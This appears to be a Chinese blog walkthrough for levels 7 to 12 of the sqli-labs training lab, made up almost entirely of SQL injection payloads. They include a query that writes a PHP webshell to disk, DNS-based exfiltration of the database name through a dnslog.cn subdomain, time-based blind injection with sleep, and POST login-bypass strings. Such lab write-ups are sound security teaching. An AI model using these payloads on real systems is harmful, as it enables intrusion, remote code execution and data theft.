sqli-labs最详细指南7-12

继承前文,我们今天接着向大家分享指南。话不多说,直接开始。

第七关

 文件读写注入

直接注入

1')) union select 1,'<?php eval($_REQUEST[23]); ?>',3 into outfile 'D://1.php' -- -

第八关  

基于’的盲注(利用dns回显

直接注入

id=1' and load_file(concat("\\\\",(database()),".2bmfvu.dnslog.cn\\1.txt")) -- -

然后进入DNSlog.cn网站

1.获取DNS地址。

2、将地址复制填入SQL语句中执行

3、在DNSLog.cn网站会看到回显结果为security效果如图:

第九关  

基于’的时间盲注

直接注入

id=1' and if(length(database())>3 ,sleep(5),1) -- -

 

 

第十关

基于”的时间盲注

直接注入(怎么样,发现了什么,没错,和上面一摸一样,只有单双引号的区别)

id=1" and if(length(database())>7 ,sleep(5),1) -- -

第十一关

基于’的post型的注入

admin' and 1=1 -- -

第十二关

基于")的POST型注入

admin") and 1=1 -- -

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

星星也倦了/

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值